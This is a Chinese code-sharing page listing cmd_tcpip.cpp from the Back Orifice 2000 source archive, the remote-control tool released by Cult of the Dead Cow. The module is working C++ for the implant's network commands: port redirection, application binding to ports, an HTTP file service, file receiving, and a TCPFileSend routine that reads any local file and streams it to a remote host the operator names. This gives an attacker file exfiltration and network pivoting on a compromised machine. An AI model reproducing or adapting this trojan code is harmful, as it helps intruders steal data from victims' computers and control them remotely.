开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 远程控制编程 > 查看源码
cmd_tcpip.cpp
资源名称:bo2ksrc.zip [点击查看]
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:13k
源码类别:

远程控制编程

开发平台:

WINDOWS

cmd_tcpip.cpp:源码内容
  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  4.     This program is free software; you can redistribute it and/or modify
  5.     it under the terms of the GNU General Public License as published by
  6.     the Free Software Foundation; either version 2 of the License, or
  7.     (at your option) any later version.
  9.     This program is distributed in the hope that it will be useful,
  10.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  11.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12.     GNU General Public License for more details.
  14.     You should have received a copy of the GNU General Public License
  15.     along with this program; if not, write to the Free Software
  16.     Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  18. The author of this program may be contacted at dildog@l0pht.com. */
  20. #include<windows.h>
  21. #include<auth.h>
  22. #include<iohandler.h>
  23. #include<cmdcmd_tcpip.h>
  25. // ---- Type Definitions ----------------------------------
  27. #define TM_PORTTHREAD_DESTROY (WM_APP+69)
  28. #define MAX_CONNECTIONS 16
  30. typedef DWORD (WINAPI *THREADPROC)(LPVOID lpParameter);
  32. #pragma pack(push,1)
  33. typedef struct __port_thread_param {
  34. SOCKET s;
  35. THREADPROC proc;
  36. int nArg1;
  37. char *svArg2;
  38. char *svArg3;
  39. } PORT_THREAD_PARAM;
  41. typedef struct __port_info {
  42. int nPort;
  43. char svType[256];
  44. DWORD dwThread;     
  45. HANDLE hThread;
  46. struct __port_info *next;
  47. } PORT_INFO;
  48. #pragma pack(pop)
  50. // ---- Globals ----------------------------------
  52. PORT_INFO *g_pPortInfoHead;
  53. CRITICAL_SECTION g_PortCritSec;
  55. // ---- Initialization ----------------------------------
  57. void Cmd_Tcpip_Init(void)
  58. {
  59. g_pPortInfoHead=NULL;
  60. InitializeCriticalSection(&g_PortCritSec);
  61. }
  63. void Cmd_Tcpip_Kill(void)
  64. {
  65. PORT_INFO *next;
  66. while(g_pPortInfoHead!=NULL) {
  68. PostThreadMessage(g_pPortInfoHead->dwThread,TM_PORTTHREAD_DESTROY,0,0);
  69. WaitForSingleObject(g_pPortInfoHead->hThread,6000);
  71. next=g_pPortInfoHead->next;
  72. free(g_pPortInfoHead);
  73. g_pPortInfoHead=next;
  74. }
  75. DeleteCriticalSection(&g_PortCritSec);
  76. }
  78. // ---- Port server thread procedure ----------------------------------
  80. DWORD WINAPI PortServerThread(LPVOID lpParameter)
  81. {
  82. SOCKET s;
  83. SOCKADDR_IN saddr;
  84. int nSize;
  85. BOOL bDone;
  86. HANDLE hChildren[MAX_CONNECTIONS];
  87. int i,j,nConnections;
  88. MSG msg;
  90. PORT_THREAD_PARAM *pptp=(PORT_THREAD_PARAM *) lpParameter;
  92. nConnections=0;
  93. bDone=FALSE;
  94. while(!bDone) {
  95. // Give up time
  96. Sleep(20);
  98. // Do we have a connection pending?
  99. if(nConnections<MAX_CONNECTIONS) {
  100. nSize=sizeof(SOCKADDR_IN);
  101. s=accept(pptp->s,(SOCKADDR *)&saddr,&nSize);
  102. if(s!=INVALID_SOCKET) {
  103. // Allocate variable passing data
  104. PORT_CHILD_PARAM *ppcp=(PORT_CHILD_PARAM *)malloc(sizeof(PORT_CHILD_PARAM));
  105. if(ppcp!=NULL) {
  106. ppcp->s=s;
  107. ppcp->nArg1=pptp->nArg1;
  108. ppcp->svArg2=pptp->svArg2;
  109. ppcp->svArg3=pptp->svArg3;
  110. ppcp->saddr=saddr;
  111. ppcp->pbDone=&bDone;
  113. DWORD tid;
  114. hChildren[nConnections]=CreateThread(NULL,0,pptp->proc,ppcp,0,&tid);
  115. if(hChildren[nConnections]==NULL) {
  116. free(ppcp);
  117. closesocket(s);
  118. } else nConnections++;
  119. }
  120. }
  121. }
  123. // Look for dead children and clean them up
  124. for(i=nConnections-1;i>=0;i--) {
  125. if(WaitForSingleObject(hChildren[i],0)!=WAIT_TIMEOUT) {
  126. for(j=i+1;j<nConnections;j++) {
  127. hChildren[j-1]=hChildren[j];
  128. }
  129. nConnections--;
  130. }
  131. }
  133. // Should we kill our children?
  134. if(PeekMessage(&msg,(HWND)-1,0,0,PM_REMOVE)) {
  135. if(msg.message==TM_PORTTHREAD_DESTROY) {
  136. bDone=TRUE;
  137. WaitForMultipleObjects(nConnections,hChildren,TRUE,6000);
  138. }
  139. }
  140. }
  142. closesocket(pptp->s);
  143. free(pptp);
  144. return 0;
  145. }
  148. // ---- Port Thread List Maintenance ----------------------------------
  153. // returns 0 if all is well. returns -1 if the port is taken already. -2 on failure.
  154. int __cdecl AddNewPortThread(THREADPROC proc, char *svType, int nPort, int nArg1, char *svArg2, char *svArg3)
  155. {
  156. // Get thread parameter passing struct 
  157. PORT_THREAD_PARAM *pptp;
  158. int nParmSize=sizeof(PORT_THREAD_PARAM) + lstrlen(svArg2) + lstrlen(svArg3) + 2;
  159. pptp=(PORT_THREAD_PARAM *)malloc(nParmSize);
  160. if(pptp==NULL) return -2;
  162. // Get thread port info struct
  163. PORT_INFO *ppi;
  164. ppi=(PORT_INFO *)malloc(sizeof(PORT_INFO));
  165. if(ppi==NULL) {
  166. free(pptp);
  167. return -2;
  168. }
  170. // Create socket for this thread
  171. SOCKET s;
  172. s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  173. if(s==INVALID_SOCKET) {
  174. free(pptp);
  175. free(ppi);
  176. return -2;
  177. }
  179. // Bind to desired port
  180. SOCKADDR_IN saddr;
  181. memset(&saddr,0,sizeof(SOCKADDR_IN));
  182. saddr.sin_family=AF_INET;
  183. saddr.sin_port=htons(nPort);
  184. saddr.sin_addr.s_addr=0;
  186. if(bind(s,(SOCKADDR *)&saddr,sizeof(SOCKADDR_IN))==SOCKET_ERROR) {
  187. closesocket(s);
  188. free(pptp);
  189. free(ppi);
  190. return -1;
  191. }
  193. listen(s,MAX_CONNECTIONS);
  195. // Nonblocking mode
  196. DWORD argp=TRUE;
  197. ioctlsocket(s,FIONBIO,&argp);
  199. // Fill in thread param information
  200. pptp->s=s;
  201. pptp->proc=proc;
  202. pptp->nArg1=nArg1;
  203. pptp->svArg2=(char *)pptp + sizeof(PORT_THREAD_PARAM);
  204. pptp->svArg3=(char *)pptp + sizeof(PORT_THREAD_PARAM) + lstrlen(svArg2) + 1;
  205. lstrcpy(pptp->svArg2,svArg2);
  206. lstrcpy(pptp->svArg3,svArg3);
  208. // Now create thread and update list
  209. EnterCriticalSection(&g_PortCritSec);
  211. // Verify port table is okay
  212. PORT_INFO *cur;
  213. for(cur=g_pPortInfoHead;cur;cur=cur->next) {
  214. if(cur->nPort==nPort) {
  215. closesocket(s);
  216. free(pptp);
  217. free(ppi);
  218. LeaveCriticalSection(&g_PortCritSec);
  219. return -2;
  220. }
  221. }
  223. // Create Thread (suspended)
  224. ppi->hThread=CreateThread(NULL,0,PortServerThread,pptp,CREATE_SUSPENDED,&(ppi->dwThread));
  225. if(ppi->hThread==NULL) {
  226. closesocket(s);
  227. free(pptp);
  228. free(ppi);
  229. LeaveCriticalSection(&g_PortCritSec);
  230. return -2;
  231. }
  233. // Add to port table
  234. wsprintf(ppi->svType,"%.64s (%.128s)",svType,svArg2);
  235. ppi->nPort=nPort;
  236. ppi->next=g_pPortInfoHead;
  237. g_pPortInfoHead=ppi;
  239. // Begin thread execution
  240. ResumeThread(ppi->hThread);
  241. LeaveCriticalSection(&g_PortCritSec);
  243. return 0;
  244. }
  246. // returns 0 if port was removed. returns -1 if the port is not there. -2 on failure.
  247. int KillPortThread(int nPort)
  248. {
  249. EnterCriticalSection(&g_PortCritSec);
  251. // Verify port is okay
  252. PORT_INFO *cur,*prev;
  253. prev=NULL;
  254. for(cur=g_pPortInfoHead;cur;cur=cur->next) {
  255. if(cur->nPort==nPort) {
  256. break;
  257. }
  258. prev=cur;
  259. }
  260. if(cur==NULL) {
  261. LeaveCriticalSection(&g_PortCritSec);
  262. return -1;
  263. }
  265. // Issue kill message to thread
  266. PostThreadMessage(cur->dwThread,TM_PORTTHREAD_DESTROY,0,0);
  268. // Wait for thread to die
  269. if(WaitForSingleObject(cur->hThread,6000)==WAIT_TIMEOUT) {
  270. LeaveCriticalSection(&g_PortCritSec);
  271. return -2;
  272. }
  274. // Erase from list
  275. if(cur==g_pPortInfoHead) g_pPortInfoHead=cur->next;
  276. else prev->next=cur->next;
  277. free(cur);
  279. LeaveCriticalSection(&g_PortCritSec);
  281. return 0;
  282. }
  285. // ---- TCP/IP Command Procedures ----------------------------------
  288. DWORD WINAPI PortRedirThread(LPVOID lpParameter);
  289. DWORD WINAPI PortHTTPThread(LPVOID lpParameter);
  290. DWORD WINAPI PortAppThread(LPVOID lpParameter);
  291. DWORD WINAPI PortFileRecvThread(LPVOID lpParameter);
  294. int CmdProc_RedirAdd(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  295. {
  296. if(AddNewPortThread(PortRedirThread, "Redir", nArg1, nArg1, svArg2, svArg3)!=0) {
  297. IssueAuthCommandReply(cas_from,comid,0,"Error starting port service.n");
  298. } else {
  299. IssueAuthCommandReply(cas_from,comid,0,"Port service startup successful.n");
  300. }
  302. return 0;
  303. }
  305. int CmdProc_AppAdd(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  306. {
  307. if(AddNewPortThread(PortAppThread, "App", nArg1, nArg1, svArg2, svArg3)!=0) {
  308. IssueAuthCommandReply(cas_from,comid,0,"Error starting port service.n");
  309. } else {
  310. IssueAuthCommandReply(cas_from,comid,0,"Port service startup successful.n");
  311. }
  313. return 0;
  314. }
  316. int CmdProc_HTTPEnable(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  317. {
  318. if(AddNewPortThread(PortHTTPThread, "HTTP", nArg1, nArg1, svArg2, svArg3)!=0) {
  319. IssueAuthCommandReply(cas_from,comid,0,"Error starting port service.n");
  320. } else {
  321. IssueAuthCommandReply(cas_from,comid,0,"Port service startup successful.n");
  322. }
  324. return 0;
  325. }
  327. int CmdProc_TCPFileReceive(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  328. {
  329. if(AddNewPortThread(PortFileRecvThread, "FileRecv", nArg1, nArg1, svArg2, svArg3)!=0) {
  330. IssueAuthCommandReply(cas_from,comid,0,"Error starting port service.n");
  331. } else {
  332. IssueAuthCommandReply(cas_from,comid,0,"Port service startup successful.n");
  333. }
  335. return 0;
  336. }
  338. int CmdProc_PortList(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  339. {
  340. PORT_INFO *cur;
  342. EnterCriticalSection(&g_PortCritSec);
  344. cur=g_pPortInfoHead;
  345. while(cur) {
  346. char svDesc[256];
  347. wsprintf(svDesc, "Port %d: --> %.200sn",cur->nPort, cur->svType);
  348. IssueAuthCommandReply(cas_from,comid,1,svDesc);
  349. cur=cur->next;
  350. }
  351. IssueAuthCommandReply(cas_from,comid,0,"End port redirect list.n");
  353. LeaveCriticalSection(&g_PortCritSec);
  355. return 0;
  356. }
  358. int CmdProc_PortDel(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  359. {
  360. if(KillPortThread(nArg1)!=0) {
  361. IssueAuthCommandReply(cas_from,comid,0,"Unable to remove port redirect.n");
  362. } else {
  363. IssueAuthCommandReply(cas_from,comid,0,"Port redirect removed.n");
  364. }
  366. return 0;
  367. }
  369. typedef struct {
  370. CAuthSocket *cas_from;
  371. int comid;
  372. SOCKET s;
  373. HANDLE hInFile;
  374. } SENDTHREADDATA;
  376. DWORD WINAPI TCPFileSendThread(LPVOID dwParam)
  377. {
  378. char svBuffer[1024];
  379. SENDTHREADDATA *pstd=(SENDTHREADDATA *)dwParam;
  381. DWORD dwBytes;
  382. do {
  383. ReadFile(pstd->hInFile,svBuffer,1024,&dwBytes,NULL);
  384. if(send(pstd->s,svBuffer,dwBytes,0)<=0) break;
  385. } while(dwBytes==1024);
  387. IssueAuthCommandReply(pstd->cas_from,pstd->comid,0,"Transfer finished.n");
  389. closesocket(pstd->s);
  390. CloseHandle(pstd->hInFile);
  391. free(pstd);
  392. return 0;
  393. }
  395. int CmdProc_TCPFileSend(CAuthSocket *cas_from, int comid, DWORD nArg1, char *svArg2, char *svArg3)
  396. {
  397. // Get thread parameter passing struct 
  398. SENDTHREADDATA *pstd;
  399. pstd=(SENDTHREADDATA *)malloc(sizeof(SENDTHREADDATA));
  400. if(pstd==NULL) {
  401. IssueAuthCommandReply(cas_from,comid,0,"Error sending file.n");
  402. return -1;
  403. }
  405. HANDLE hInFile;
  406. hInFile=CreateFile(svArg3,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL);
  407. if(hInFile==INVALID_HANDLE_VALUE) {
  408. IssueAuthCommandReply(cas_from,comid,0,"Couldn't open local file.n");
  409. return -1;
  410. }
  412. // Create socket for this thread
  413. SOCKET s;
  414. s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  415. if(s==INVALID_SOCKET) {
  416. IssueAuthCommandReply(cas_from,comid,0,"Error creating socket.n");
  417. CloseHandle(hInFile);
  418. free(pstd);
  419. return -1;
  420. }
  422. // Bind to desired port
  423. if(nArg1!=0) {
  424. SOCKADDR_IN saddr;
  425. memset(&saddr,0,sizeof(SOCKADDR_IN));
  426. saddr.sin_family=AF_INET;
  427. saddr.sin_port=htons((WORD)nArg1);
  428. saddr.sin_addr.s_addr=0;
  430. if(bind(s,(SOCKADDR *)&saddr,sizeof(SOCKADDR_IN))==SOCKET_ERROR) {
  431. IssueAuthCommandReply(cas_from,comid,0,"Error binding local port.n");
  432. closesocket(s);
  433. CloseHandle(hInFile);
  434. free(pstd);
  435. return -1;
  436. }
  437. }
  440. // Fill in thread param information
  441. pstd->s=s;
  442. pstd->cas_from=cas_from;
  443. pstd->comid=comid;
  444. pstd->hInFile=hInFile;
  446. // Blocking mode
  447. DWORD argp=FALSE;
  448. ioctlsocket(s,FIONBIO,&argp);
  450. // Get remote address and port
  451. int nPort;
  452. DWORD dwAddr;
  453. char *c;
  454. if((c=strrchr(svArg2,':'))==NULL) {
  455. IssueAuthCommandReply(cas_from,comid,0,"No target port specifiedn");
  456. closesocket(s);
  457. CloseHandle(hInFile);
  458. free(pstd);
  459. return -1;
  460. }
  461. nPort=atoi(c+1);
  462. *c=0;
  464. dwAddr=inet_addr(svArg2);
  465. if(dwAddr==INADDR_NONE) {
  466. struct hostent *hent;
  467. hent=gethostbyname(svArg2);
  468. if(hent==NULL) {
  469. IssueAuthCommandReply(cas_from,comid,0,"Could not resolve hostnamen");
  470. closesocket(s);
  471. CloseHandle(hInFile);
  472. free(pstd);
  473. return -1;
  474. }
  475. dwAddr=*(DWORD *)hent->h_addr_list[0];
  476. }
  478. // Connect to remote host
  480. SOCKADDR_IN daddr;
  481. memset(&daddr,0,sizeof(SOCKADDR_IN));
  482. daddr.sin_family=AF_INET;
  483. daddr.sin_port=htons(nPort);
  484. daddr.sin_addr.s_addr=dwAddr;
  486. if(connect(s,(SOCKADDR *)&daddr,sizeof(SOCKADDR_IN))!=0) {
  487. IssueAuthCommandReply(cas_from,comid,0,"Could not connect to remote host.n");
  488. closesocket(s);
  489. CloseHandle(hInFile);
  490. free(pstd);
  491. return -1;
  492. }
  494. // Create transfer thread
  495. DWORD dwThread;
  496. if(CreateThread(NULL,0, TCPFileSendThread, pstd, 0, &dwThread)==NULL) {
  497. IssueAuthCommandReply(cas_from,comid,0,"Error creating send thread.n");
  498. closesocket(s);
  499. CloseHandle(hInFile);
  500. free(pstd);
  501. }
  503. IssueAuthCommandReply(cas_from,comid,1,"Transferring....n");
  505. return 0;
  506. }